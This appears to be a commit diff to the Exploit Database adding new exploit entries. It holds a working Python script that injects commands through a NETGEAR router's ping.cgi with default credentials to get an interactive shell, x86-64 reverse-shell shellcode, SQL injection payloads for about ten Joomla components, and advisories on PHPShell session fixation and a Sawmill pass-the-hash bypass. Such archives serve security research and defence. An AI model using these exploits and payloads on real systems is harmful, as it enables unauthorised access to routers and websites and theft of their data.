DB: 2017-02-20

14 new exploits

Linux - Reverse Shell Shellcode (66 bytes)

Joomla! Component com_Joomlaoc - 'id' SQL Injection
Joomla! Component Joomloc 1.0 - 'id' Parameter SQL Injection

Joomla! Component com_awdwall 1.5.4 - Local File Inclusion / SQL Injection
Joomla! Component AWDwall 1.5.4 - Local File Inclusion / SQL Injection

Joomla! Component 'com_osproperty' 2.0.2 - Unrestricted Arbitrary File Upload
Joomla! Component com_osproperty 2.0.2 - Unrestricted Arbitrary File Upload

Horde 3.3.5 - Administration Interface admin/PHPshell.php PATH_INFO Parameter Cross-Site Scripting
Horde 3.3.5 - Cross-Site Scripting
Joomla! Component Joomloc-CAT 4.1.3 - 'ville' Parameter SQL Injection
Joomla! Component Joomloc-Lite 1.3.2 - 'site_id' Parameter SQL Injection
Joomla! Component JomWALL 4.0 - 'wuid' Parameter SQL Injection
Joomla! Component OS Property 3.0.8 - SQL Injection
Joomla! Component EShop 2.5.1 - 'id' Parameter SQL Injection
Joomla! Component OS Services Booking 2.5.1 - SQL Injection
Joomla! Component Room Management 1.0 - SQL Injection
Joomla! Component Bazaar Platform 3.0 - SQL Injection
Joomla! Component Google Map Store Locator 4.4 - SQL Injection
Joomla! Component Most Wanted Real Estate 1.1.0 - SQL Injection
NETGEAR DGN2200v1/v2/v3/v4 - 'ping.cgi' Remote Command Execution
Sawmill Enterprise 8.7.9 - Authentication Bypass
PHPShell 2.4 - Session Fixation

files.csv

@@ -15898,6 +15898,7 @@ id,file,description,date,author,platform,type,port
 41282,platforms/lin_x86/shellcode/41282.nasm,"Linux/x86 - Reverse TCP Alphanumeric Staged Shellcode (103 bytes)",2017-02-08,"Snir Levi",lin_x86,shellcode,0
 41375,platforms/linux/shellcode/41375.c,"Linux - Dual/Multi mode Bind Shell Shellcode (156 bytes)",2017-02-16,odzhancode,linux,shellcode,0
 41381,platforms/win_x86/shellcode/41381.c,"Windows x86 - Protect Process Shellcode (229 bytes)",2017-02-17,"Ege Balci",win_x86,shellcode,0
+41398,platforms/linux/shellcode/41398.nasm,"Linux - Reverse Shell Shellcode (66 bytes)",2017-02-19,"Robert L. Taylor",linux,shellcode,0
 6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
 44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
 47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
@@ -21643,7 +21644,7 @@ id,file,description,date,author,platform,type,port
 9601,platforms/php/webapps/9601.php,"Joomla! Component BF Survey Pro Free - SQL Injection",2009-09-09,jdc,php,webapps,0
 9602,platforms/php/webapps/9602.pl,"Joomla! Component TPDugg 1.1 - Blind SQL Injection",2009-09-09,NoGe,php,webapps,0
 9603,platforms/php/webapps/9603.txt,"Model Agency Manager Pro - (user_id) SQL Injection",2009-09-09,R3d-D3V!L,php,webapps,0
-9604,platforms/php/webapps/9604.txt,"Joomla! Component com_Joomlaoc - 'id' SQL Injection",2009-09-09,"Chip d3 bi0s",php,webapps,0
+9604,platforms/php/webapps/9604.txt,"Joomla! Component Joomloc 1.0 - 'id' Parameter SQL Injection",2009-09-09,"Chip d3 bi0s",php,webapps,0
 9605,platforms/php/webapps/9605.pl,"Agoko CMS 0.4 - Remote Command Execution",2009-09-09,StAkeR,php,webapps,0
 9609,platforms/php/webapps/9609.txt,"Mambo Component Hestar - SQL Injection",2009-09-09,M3NW5,php,webapps,0
 9611,platforms/php/webapps/9611.txt,"PHPNagios 1.2.0 - 'menu.php' Local File Inclusion",2009-09-09,CoBRa_21,php,webapps,0
@@ -22939,7 +22940,7 @@ id,file,description,date,author,platform,type,port
 12108,platforms/php/webapps/12108.txt,"Joomla! Component com_articles - SQL Injection",2010-04-08,"pratul agrawal",php,webapps,0
 12111,platforms/php/webapps/12111.txt,"Joomla! Component 'com_webeecomment' 2.0 - Local File Inclusion",2010-04-08,AntiSecurity,php,webapps,0
 12112,platforms/php/webapps/12112.txt,"Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion",2010-04-08,AntiSecurity,php,webapps,0
-12113,platforms/php/webapps/12113.txt,"Joomla! Component com_awdwall 1.5.4 - Local File Inclusion / SQL Injection",2010-04-08,AntiSecurity,php,webapps,0
+12113,platforms/php/webapps/12113.txt,"Joomla! Component AWDwall 1.5.4 - Local File Inclusion / SQL Injection",2010-04-08,AntiSecurity,php,webapps,0
 12115,platforms/php/webapps/12115.txt,"Kubeit CMS - SQL Injection",2010-04-08,Phenom,php,webapps,0
 12118,platforms/php/webapps/12118.txt,"Joomla! Component PowerMail Pro 1.5.3 - Local File Inclusion",2010-04-09,AntiSecurity,php,webapps,0
 12120,platforms/php/webapps/12120.txt,"Joomla! Component Foobla Suggestions 1.5.1.2 - Local File Inclusion",2010-04-09,"Chip d3 bi0s",php,webapps,0
@@ -25626,7 +25627,7 @@ id,file,description,date,author,platform,type,port
 19792,platforms/php/webapps/19792.txt,"Joomla! Component 'com_ksadvertiser' - Remote File / Bypass Upload",2012-07-13,D4NB4R,php,webapps,0
 19825,platforms/php/webapps/19825.php,"Shopware 3.5 - SQL Injection",2012-07-14,Kataklysmos,php,webapps,0
 19964,platforms/php/webapps/19964.txt,"PHP-Nuke module (SPChat) - SQL Injection",2012-07-20,"Yakir Wizman",php,webapps,0
-19829,platforms/php/webapps/19829.txt,"Joomla! Component 'com_osproperty' 2.0.2 - Unrestricted Arbitrary File Upload",2012-07-14,D4NB4R,php,webapps,0
+19829,platforms/php/webapps/19829.txt,"Joomla! Component com_osproperty 2.0.2 - Unrestricted Arbitrary File Upload",2012-07-14,D4NB4R,php,webapps,0
 19859,platforms/hardware/webapps/19859.txt,"Vivotek Cameras - Sensitive Information Disclosure",2012-07-16,GothicX,hardware,webapps,0
 19862,platforms/php/webapps/19862.pl,"WordPress Theme Diary/Notebook Site5 - Email Spoofing",2012-07-16,bwall,php,webapps,0
 19863,platforms/php/webapps/19863.txt,"CakePHP 2.x < 2.2.0-RC2 - XXE Injection",2012-07-16,"Pawel Wylecial",php,webapps,0
@@ -27494,7 +27495,7 @@ id,file,description,date,author,platform,type,port
 25302,platforms/php/webapps/25302.txt,"PHPCOIN 1.2 - auxpage.php page Parameter Traversal Arbitrary File Access",2005-03-29,"James Bercegay",php,webapps,0
 25304,platforms/php/webapps/25304.py,"MoinMoin - Arbitrary Command Execution",2013-05-08,HTP,php,webapps,0
 25305,platforms/multiple/webapps/25305.py,"ColdFusion 9-10 - Credential Disclosure",2013-05-08,HTP,multiple,webapps,0
-33406,platforms/php/webapps/33406.txt,"Horde 3.3.5 - Administration Interface admin/PHPshell.php PATH_INFO Parameter Cross-Site Scripting",2009-12-15,"Juan Galiana Lara",php,webapps,0
+33406,platforms/php/webapps/33406.txt,"Horde 3.3.5 - Cross-Site Scripting",2009-12-15,"Juan Galiana Lara",php,webapps,0
 33407,platforms/php/webapps/33407.txt,"Horde 3.3.5 - Administration Interface admin/cmdshell.php PATH_INFO Parameter Cross-Site Scripting",2009-12-15,"Juan Galiana Lara",php,webapps,0
 33408,platforms/php/webapps/33408.txt,"Horde 3.3.5 - Administration Interface admin/sqlshell.php PATH_INFO Parameter Cross-Site Scripting",2009-12-15,"Juan Galiana Lara",php,webapps,0
 25308,platforms/php/webapps/25308.txt,"PhotoPost Pro 5.1 - showgallery.php Multiple Parameter Cross-Site Scripting",2005-03-28,"Diabolic Crab",php,webapps,0
@@ -37300,3 +37301,16 @@ id,file,description,date,author,platform,type,port
 41379,platforms/php/webapps/41379.txt,"Joomla! Component Team Display 1.2.1 - 'filter_category' Parameter SQL Injection",2017-02-17,"Ihsan Sencan",php,webapps,0
 41380,platforms/php/webapps/41380.txt,"Joomla! Component Groovy Gallery 1.0.0 - SQL Injection",2017-02-17,"Ihsan Sencan",php,webapps,0
 41382,platforms/php/webapps/41382.txt,"Joomla! Component WMT Content Timeline 1.0 - 'id' Parameter SQL Injection",2017-02-17,"Ihsan Sencan",php,webapps,0
+41383,platforms/php/webapps/41383.txt,"Joomla! Component Joomloc-CAT 4.1.3 - 'ville' Parameter SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0
+41384,platforms/php/webapps/41384.txt,"Joomla! Component Joomloc-Lite 1.3.2 - 'site_id' Parameter SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0
+41385,platforms/php/webapps/41385.txt,"Joomla! Component JomWALL 4.0 - 'wuid' Parameter SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0
+41386,platforms/php/webapps/41386.txt,"Joomla! Component OS Property 3.0.8 - SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0
+41387,platforms/php/webapps/41387.txt,"Joomla! Component EShop 2.5.1 - 'id' Parameter SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0
+41388,platforms/php/webapps/41388.txt,"Joomla! Component OS Services Booking 2.5.1 - SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0
+41389,platforms/php/webapps/41389.txt,"Joomla! Component Room Management 1.0 - SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0
+41390,platforms/php/webapps/41390.txt,"Joomla! Component Bazaar Platform 3.0 - SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0
+41391,platforms/php/webapps/41391.txt,"Joomla! Component Google Map Store Locator 4.4 - SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0
+41393,platforms/php/webapps/41393.txt,"Joomla! Component Most Wanted Real Estate 1.1.0 - SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0
+41394,platforms/hardware/webapps/41394.py,"NETGEAR DGN2200v1/v2/v3/v4 - 'ping.cgi' Remote Command Execution",2017-02-18,SivertPL,hardware,webapps,0
+41395,platforms/windows/webapps/41395.txt,"Sawmill Enterprise 8.7.9 - Authentication Bypass",2017-02-18,hyp3rlinx,windows,webapps,0
+41396,platforms/php/webapps/41396.txt,"PHPShell 2.4 - Session Fixation",2017-02-19,hyp3rlinx,php,webapps,0

platforms/hardware/webapps/41394.py

@@ -0,0 +1,58 @@
+#!/usr/bin/python
+#Provides access to default user account, privileges can be easily elevated by using either:
+# - a kernel exploit (ex. memodipper was tested and it worked)
+# - by executing /bin/bd (suid backdoor present on SOME but not all versions)
+# - by manipulating the httpd config files to trick the root user into executing your code (separate advisory will be released soon along with the 2nd vuln)
+
+#Pozdrawiam: Kornela, Komara i Sknerusa
+
+import sys
+import requests
+
+#You can change these credentials to ex. Gearguy/Geardog or Guest/Guest which are hardcoded on SOME firmware versions
+#These routers DO NOT support telnet/ssh access so you can use this exploit to access the shell if you want to
+
+login = 'admin'
+password = 'password' 
+
+
+def main():
+	if len(sys.argv) < 2 or len(sys.argv) == 3:
+		print "./netgearpwn.py <router ip>"
+		return
+	spawnShell()
+
+def execute(cmd):
+	r = requests.post("http://" + sys.argv[1] + "/ping.cgi", data={'IPAddr1': 12, 'IPAddr2': 12, 'IPAddr3': 12, 'IPAddr4': 12, 'ping':"Ping", 'ping_IPAddr':"12.12.12.12; " + cmd}, auth=(login, password), headers={'referer': "http://192.168.0.1/DIAG_diag.htm"})
+	result = parseOutput(r.text)	
+	return result
+
+def spawnShell():
+	r = execute("echo pwn3d")
+
+	if any("pwn3d" in s for s in r) == False:
+		print "Something went wrong, is the system vulnerable? Are the credentials correct?"
+		return
+
+	while True:
+		cmd = raw_input("$ ")
+		r = execute(cmd)
+		for l in r:
+			print l.encode("utf-8")
+
+def parseOutput(output):
+	yet = False
+	a = False
+	result = []
+	for line in output.splitlines():
+		if line.startswith("<textarea"):
+			yet = True
+			continue
+		if yet == True: 			
+			if line.startswith("</textarea>"):
+				break
+			result.append(line)
+	return result
+
+if __name__ == "__main__":
+	main()

platforms/linux/shellcode/41398.nasm

@@ -0,0 +1,71 @@
+;The MIT License (MIT)
+
+;Copyright (c) 2017 Robert L. Taylor
+
+;Permission is hereby granted, free of charge, to any person obtaining a 
+;copy of this software and associated documentation files (the “Software”), 
+;to deal in the Software without restriction, including without limitation 
+;the rights to use, copy, modify, merge, publish, distribute, sublicense, 
+;and/or sell copies of the Software, and to permit persons to whom the 
+;Software is furnished to do so, subject to the following conditions:
+
+;The above copyright notice and this permission notice shall be included 
+;in all copies or substantial portions of the Software.
+
+;The Software is provided “as is”, without warranty of any kind, express or
+;implied, including but not limited to the warranties of merchantability, 
+;fitness for a particular purpose and noninfringement. In no event shall the
+;authors or copyright holders be liable for any claim, damages or other 
+;liability, whether in an action of contract, tort or otherwise, arising 
+;from, out of or in connection with the software or the use or other 
+;dealings in the Software.
+;
+; For a detailed explanation of this shellcode see my blog post: 
+; http://a41l4.blogspot.ca/2017/02/assignment-2b.html
+
+global _start
+section .text
+_start:
+; Socket
+	push 41
+	pop rax
+	push 2
+	pop rdi
+	push 1
+	pop rsi
+	cdq
+	syscall
+; Connect
+	xchg edi, eax
+	push rdx
+	mov rbx, 0xfeffff80a3eefffd ; not encoded 0x0100007f5c110002
+	not rbx
+	push rbx
+	mov al, 42
+	push rsp
+	pop rsi
+	mov dl, 16
+	syscall
+; Dup 2
+	push 3
+	pop rsi
+dup2loop:	
+	mov al, 33
+	dec esi
+        syscall
+	loopnz dup2loop
+; Execve
+	; rax and rsi are zero from the result of the last dup2 syscall and loop
+        push rax ; zero terminator for the following string that we are pushing
+
+        mov rbx, '/bin//sh'
+        push rbx
+
+        ; store /bin//sh address in RDI
+	push rsp
+	pop rdi
+	
+	cdq ; zero rdx
+
+	mov al, 59
+        syscall

platforms/php/webapps/33406.txt

@@ -8,4 +8,4 @@ This issue affects versions prior to Horde 3.3.6.
 
 Note that additional products that use the Horde framework may also be vulnerable. 
 
-http://www.example.com/horde-3.3.5/admin/phpshell.php/%22%3E%3Cscript%3Ealert%288%29;%3C/script%3E%3Cform%20/?Horde=<sessid>
+http://www.example.com/horde-3.3.5/admin/phpshell.php/%22%3E%3Cscript%3Ealert%288%29;%3C/script%3E%3Cform%20/?Horde=<sessid>

platforms/php/webapps/41383.txt

@@ -0,0 +1,17 @@
+# # # # # 
+# Exploit Title: Joomla! Component Joomloc-CAT v4.1.3 - SQL Injection
+# Google Dork: inurl:index.php?option=com_joomloc
+# Date: 18.02.2017
+# Vendor Homepage: http://www.joomloc.fr.nf/
+# Software Buy: https://extensions.joomla.org/extensions/extension/vertical-markets/booking-a-reservations/joomloc-cat/
+# Demo: http://www.joomloc.fr.nf/joomlocprocmpms/
+# Version: 4.1.3
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?option=com_joomloc&view=engine&layout=geo&liste=65&place=dep&ville=[SQL]
+# # # # #

platforms/php/webapps/41384.txt

@@ -0,0 +1,18 @@
+# # # # # 
+# Exploit Title: Joomla! Component Joomloc-Lite v1.3.2 - SQL Injection
+# Google Dork: inurl:index.php?option=com_joomloc
+# Date: 18.02.2017
+# Vendor Homepage: http://www.joomloc.fr.nf/
+# Software Buy: https://extensions.joomla.org/extensions/extension/vertical-markets/booking-a-reservations/joomloc-lite/
+# Demo: http://www.joomloc.fr.nf/joomloclite/
+# Version: 1.3.2
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?option=com_joomloc&view=loc&layout=singleloc&site_id=[SQL]
+# # # # #
+

platforms/php/webapps/41385.txt

@@ -0,0 +1,17 @@
+# # # # # 
+# Exploit Title: Joomla! Component JomWALL v4.0 - SQL Injection
+# Google Dork: inurl:index.php?option=com_awdwall
+# Date: 18.02.2017
+# Vendor Homepage: http://dashbite.com/
+# Software Buy: https://extensions.joomla.org/extensions/extension/clients-a-communities/communities/jomwall/
+# Demo: http://demo-dashbite.com/
+# Version: 4.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?option=com_awdwall&task=gethovercard&wuid=[SQL]
+# # # # #

platforms/php/webapps/41386.txt

@@ -0,0 +1,17 @@
+# # # # # 
+# Exploit Title: Joomla! Component OS Property v3.0.8 - SQL Injection
+# Google Dork: inurl:index.php?option=com_osproperty
+# Date: 18.02.2017
+# Vendor Homepage: https://www.joomdonation.com/
+# Software Buy: https://www.joomdonation.com/joomla-extensions/os-property-joomla-real-estate.html
+# Demo: http://osproperty.ext4joomla.com/
+# Version: 3.0.8
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?option=com_osproperty&view=ltype&catIds[0]=[SQL]
+# # # # #

platforms/php/webapps/41387.txt

@@ -0,0 +1,17 @@
+# # # # # 
+# Exploit Title: Joomla! Component EShop v2.5.1 - SQL Injection
+# Google Dork: inurl:index.php?option=com_eshop
+# Date: 18.02.2017
+# Vendor Homepage: https://www.joomdonation.com/
+# Software Buy: https://www.joomdonation.com/joomla-extensions/eshop-joomla-shopping-cart.html
+# Demo: http://joomdonationdemo.com/eshop
+# Version: 2.5.1
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?option=com_eshop&view=category&id=[SQL]
+# # # # #

platforms/php/webapps/41388.txt

@@ -0,0 +1,21 @@
+# # # # # 
+# Exploit Title: Joomla! Component OS Services Booking v2.5.1 - SQL Injection
+# Google Dork: inurl:index.php?option=com_osservicesbooking
+# Date: 18.02.2017
+# Vendor Homepage: https://www.joomdonation.com/
+# Software Buy: https://www.joomdonation.com/joomla-extensions/joomla-services-appointment-booking.html
+# Demo: http://osb.ext4joomla.com/
+# Version: 2.5.1
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?option=com_osservicesbooking&task=default_showmap&vid=[SQL]
+# http://localhost/[PATH]/index.php?option=com_osservicesbooking&view=default&category_id=[SQL]
+# http://localhost/[PATH]/index.php?option=com_osservicesbooking&view=default&category_id=15&employee_id=[SQL]
+# http://localhost/[PATH]/index.php?option=com_osservicesbooking&view=default&category_id=15&employee_id=&vid=[SQL]
+# Etc..
+# # # # #

platforms/php/webapps/41389.txt

@@ -0,0 +1,23 @@
+# # # # # 
+# Exploit Title: Joomla! Component Room Management v1.0 - SQL Injection
+# Google Dork: inurl:index.php?option=com_roommgmt
+# Date: 18.02.2017
+# Vendor Homepage: http://matamko.com/
+# Software Buy: http://matamko.com/products/room-management/live-demo
+# Demo: http://matamko.com/products/room-management/live-demo
+# Version: 1.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/room/book?tmpl=component&id=5&date=[SQL]
+# '+/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- -
+# http://localhost/[PATH]/my-bookings?task=booking.cancelBooking&status=[SQL]
+# '+/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- -
+# http://localhost/[PATH]/my-bookings?task=booking.cancelBooking&status=0&id=[SQL]
+# +/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- -
+# Etc...
+# # # # #

platforms/php/webapps/41390.txt

@@ -0,0 +1,23 @@
+# # # # # 
+# Exploit Title: Joomla! Component Bazaar Platform v3.0 - SQL Injection
+# Google Dork: inurl:index.php?option=com_bazaar
+# Date: 18.02.2017
+# Vendor Homepage: http://matamko.com/
+# Software Buy: http://matamko.com/products/bazaar/live-demo
+# Demo: http://matamko.com/products/bazaar/live-demo
+# Version: 3.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/index.php?option=com_bazaar&view=productsearch&searchproduct=a&category=[SQL]
+# 1+/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- -
+# http://localhost/[PATH]/index.php?option=com_bazaar&view=productsearch&searchproduct=[SQL]
+# 1'+/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- -
+# http://localhost/[PATH]/index.php?option=com_bazaar&view=product&productid=[SQL]
+# 1+/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- -
+# Etc...
+# # # # #

platforms/php/webapps/41391.txt

@@ -0,0 +1,19 @@
+# # # # # 
+# Exploit Title: Joomla! Component Google Map Store Locator v4.4 - SQL Injection
+# Google Dork: inurl:index.php?option=com_googlemaplocator
+# Date: 18.02.2017
+# Vendor Homepage: http://matamko.com/
+# Software Buy: http://matamko.com/products/google-map-store-locator/live-demo
+# Demo: http://gtlocator4.demo.matamko.com/
+# Version: 4.4
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/?filter_to=a&filter_day=21-02-2017&filter_time=[SQL]
+# +/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- -
+# Etc...
+# # # # #

platforms/php/webapps/41393.txt

@@ -0,0 +1,20 @@
+# # # # # 
+# Exploit Title: Joomla! Component Most Wanted Real Estate v1.1.0 - SQL Injection
+# Google Dork: inurl:index.php?option=com_mostwantedrealestate
+# Date: 18.02.2017
+# Vendor Homepage: http://mostwantedrealestatesites.com/
+# Software Buy: https://extensions.joomla.org/extensions/extension/vertical-markets/real-estate/most-wanted-real-estate/
+# Demo: http://demo.mostwantedrealestatesites.com/
+# Version: 1.1.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/?filter_a1search=Ihsan_Sencan&filter_a1type=0&filter_a1minprice=&filter_a1maxprice=&filter_a1locality=0&filter_a1minbed=0&filter_a1minbaths=&filter_a1minarea=&filter_a1maxarea=&filter_a1minland=&filter_a1maxland=&filter_a1landtype=0&which_order=[SQL]
+# http://localhost/[PATH]/?filter_a1search=Ihsan_Sencan&filter_a1type=0&filter_a1minprice=&filter_a1maxprice=&filter_a1locality=0&filter_a1minbed=0&filter_a1minbaths=&filter_a1minarea=&filter_a1maxarea=[SQL]
+# http://localhost/[PATH]/?filter_a1search=Ihsan_Sencan&filter_a1type=0&filter_a1minprice=&filter_a1maxprice=&filter_a1locality=0&filter_a1minbed=0&filter_a1minbaths=&filter_a1minarea=[SQL]
+# Etc...
+# # # # #

platforms/php/webapps/41396.txt

@@ -0,0 +1,136 @@
+[+] Credits: John Page AKA hyp3rlinx
+[+] Website: hyp3rlinx.altervista.org
+[+] Source: http://hyp3rlinx.altervista.org/advisories/PHPSHELL-v2.4-SESSION-FIXATION.txt
+[+] ISR: ApparitionSec
+
+
+
+Vendor:
+==================================
+sourceforge.net/projects/phpshell/
+phpshell.sourceforge.net/
+
+
+
+Product:
+==============
+PHPShell v2.4
+
+
+
+Vulnerability Type:
+===================
+Session Fixation
+
+
+
+CVE Reference:
+==============
+N/A
+
+
+
+Security Issue:
+================
+PHPShell does not regenerate the Session ID upon authentication, this can
+potentially allow remote attackers to access parts of the application
+using only a valid PHPSESSID if PHP.INI setting for
+session.use_only_cookies=0.
+
+Since an existing XSS vulnerability exists in PHPShell "
+http://hyp3rlinx.altervista.org/advisories/PHPSHELL-v2.4-CROSS-SITE-SCRIPTING.txt"
+the risk is
+increased if an authenticated user clicks an attacker supplied link and the
+attacker finds way to access or set the victims Cookie.
+
+In 'phpshell.php' line 153 we see call to PHP function session_start();
+
+After user authentication no call to "session_regenerate_id()" is made
+leaving the authenticated session id same as pre-auth session id.
+However, "session.use_only_cookies=1" is default since PHP 4.3.0, so to
+exploit it would require that PHP.INI is set to session.use_only_cookies=0
+on the victims system.
+
+When accessing the application using the session fixation flaw and
+attempting to run system command the application luckily redirects to login
+form.
+However, if a victim is actively changing directorys, reading files etc...
+attackers may still be able to read current directory and files open
+in the victims PHPShell console window.
+
+
+
+Exploit/POC:
+=============
+
+1) Login to PHPShell run commands to CD to Windows directory and run DIR
+command etc, then find and copy the PHPSESSID Cookie
+
+2) Open a second browser (InternetExplorer) and access the application
+cleanly for first time using the PHPSESSID in URL.
+
+e.g.
+
+http://VICTIM-IP/phpshell-2.4/phpshell.php?PHPSESSID=<STOLEN-SESSION-ID>
+
+You should see what the authenticated victim now sees...
+
+e.g.
+
+Current Working Directory:
+Change to subdirectory:
+
+07/13/2009  08:51 PM            24,576 Microsoft.MediaCenter.iTv.Hosting.dll
+11/20/2010  10:24 PM           147,968 Microsoft.MediaCenter.iTV.Media.dll
+07/13/2009  08:52 PM            45,056 Microsoft.MediaCenter.ITVVM.dll
+11/20/2010  10:24 PM            56,320 Microsoft.MediaCenter.Mheg.dll
+11/20/2010  10:24 PM           114,688 Microsoft.MediaCenter.Playback.dll
+11/20/2010  10:24 PM         1,572,864 Microsoft.MediaCenter.Shell.dll
+11/20/2010  10:24 PM           241,664 Microsoft.MediaCenter.Sports.dll
+11/20/2010  10:24 PM           327,168
+Microsoft.MediaCenter.TV.Tuners.Interop.dll
+11/20/2010  10:24 PM         2,596,864 Microsoft.MediaCenter.UI.dll
+10/29/2011  12:23 AM           465,920 mstvcapn.dll
+11/20/2010  10:24 PM            88,576 NetBridge.dll
+07/13/2009  08:51 PM           106,496 RegisterMCEApp.exe
+06/10/2009  04:04 PM           129,528 segmcr.ttf
+
+etc...
+
+
+
+Network Access:
+===============
+Remote
+
+
+
+
+Severity:
+=========
+Medium
+
+
+
+Disclosure Timeline:
+=============================
+Vendor Notification:  No reply
+Also, the INSTALL file "Bugs?  Comments? Tracker System link" is HTTP 404
+http://sourceforge.net/tracker/?group_id=156638
+February 18, 2017 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no
+warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory,
+provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in
+vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the
+information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author
+prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c) HYP3RLINX -
+ApparitionSec

platforms/windows/webapps/41395.txt

@@ -0,0 +1,138 @@
+[+] Credits: John Page AKA Hyp3rlinx
+[+] Website: hyp3rlinx.altervista.org
+[+] Source: http://hyp3rlinx.altervista.org/advisories/SAWMILL-PASS-THE-HASH-AUTHENTICATION-BYPASS.txt
+[+] ISR: ApparitionSec
+
+
+
+Vendor:
+===============
+www.sawmill.net
+
+
+
+Product:
+========================
+Sawmill Enterprise v8.7.9
+
+sawmill8.7.9.4_x86_windows.exe
+hash: b7ec7bc98c42c4908dfc50450b4521d0
+
+Sawmill is a powerful heirarchical log analysis tool that runs on every
+major platform.
+
+
+Vulnerability Type:
+===================================
+Pass the Hash Authentication Bypass
+
+
+
+CVE Reference:
+==============
+CVE-2017-5496
+
+
+
+Security Issue:
+=====================
+Sawmill suffers from a classic "Pass The Hash" vulnerability whereby an
+attacker who gains access to the hashed user account passwords
+can login to the Sawmill interface using the raw MD5 hash values, allowing
+attackers to bypass the work of offline cracking
+account password hashes.
+
+
+This issue usually is known to affect Windows systems e.g. (NT Pass the
+Hash/Securityfocus, 1997). However, this vulnerability can also
+present itself in a vulnerable Web application.
+
+Sawmill account password hashes are stored under LogAnalysisInfo/ directory
+in "users.cfg".
+
+e.g.
+
+users = {
+  root_admin = {
+    username = "admin"
+    password_checksum = "e99a18c428cb38d5f260853678922e03"
+    email_address = ""
+
+
+This config file is stored local to the Sawmill application. However, if an
+attacker gains access to a backup of the config that is
+stored in some other location that is then compromised, it can lead to
+subversion of Sawmills authenticaton process.
+
+Moreover, since 'users.cfg' file is world readble a regular non Admin
+Windows user who logs into the system running sawmill can now grab
+a password hash and easily login to the vulnerable application without the
+needing the password itself.
+
+
+How to test?
+
+
+Sawmill running (default port 8988), log off Windows and switch to a
+"Standard" Windows non Administrator user.
